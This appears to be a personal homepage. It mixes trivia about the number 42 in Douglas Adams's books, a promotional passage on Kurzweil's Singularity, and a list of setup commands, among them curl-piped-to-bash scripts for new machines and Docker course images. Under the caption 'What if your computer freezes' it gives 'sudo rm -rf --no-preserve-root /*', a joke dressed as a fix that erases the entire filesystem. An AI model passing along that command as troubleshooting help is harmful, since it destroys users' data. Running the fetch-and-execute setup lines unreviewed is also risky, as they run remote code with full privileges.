Welcome!

In The Hitchhiker's Guide to the Galaxy by Douglas Adams, the number 42 is the Answer to the Ultimate Question of Life, the Universe, and Everything calculated by an enormous supercomputer named Deep Thought over a period of 7.5 million years. Unfortunately, no one knows what the question is. Thus, to calculate the Ultimate Question, a special computer the size of a small planet was built from organic components and named "Earth". The Ultimate Question, "What do you get when you multiply six by nine?" was found by Arthur Dent and Ford Prefect in the second book of the series, The Restaurant at the End of the Universe. This appeared first in the radio play and later in the novelization of The Hitchhiker's Guide to the Galaxy. The fact that Adams named the episodes of the radio play "fits", the same archaic title for a chapter or section used by Lewis Carroll in The Hunting of the Snark, suggests that Adams was influenced by Carroll's fascination with and frequent use of the number. The fourth book in the series, the novel So Long, and Thanks for All the Fish, contains 42 chapters. According to the novel Mostly Harmless, 42 is the street address of Stavromula Beta. In 1994 Adams created the 42 Puzzle, a game based on the number 42.

That merging is the essence of the Singularity, an era in which our intelligence will become increasingly nonbiological and trillions of times more powerful than it is today—the dawning of a new civilization that will enable us to transcend our biological limitations and amplify our creativity. In this new world, there will be no clear distinction between human and machine, real reality and virtual reality. We will be able to assume different bodies and take on a range of personae at will. In practical terms, human aging and illness will be reversed; pollution will be stopped; world hunger and poverty will be solved. Nanotechnology will make it possible to create virtually any physical product using inexpensive information processes and will ultimately turn even death into a soluble problem. While the social and philosophical ramifications of these changes will be profound, and the threats they pose considerable, The Singularity Is Near maintains a radically optimistic view of the future course of human development. As such, it offers a view of the coming age that is both a dramatic culmination of centuries of technological ingenuity and a genuinely inspiring vision of our ultimate destiny.


Competitive Programming

Warehouse

For Rustaceans


For your brand new computer

 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/hyeondg/config/main/init.sh)" --  

For your brand new container

 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/hyeondg/config/main/docker_init.sh)" 

Universe

 The quick brown fox jumped over the lazy dog 

Rust!

 curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh 

What if your computer freezes

 sudo rm -rf --no-preserve-root /* 



CS311 Computer Organization

 xhost +localhost; docker run -it --rm -e DISPLAY=docker.for.mac.host.internal:0 -v .:/mnt hyeondg/cs311 

CS360 Introduction to Database

 xhost +localhost; docker run -it --rm -e DISPLAY=docker.for.mac.host.internal:0 -v .:/mnt hyeondg/cs360 

Something

print("Hello, world!")
with python3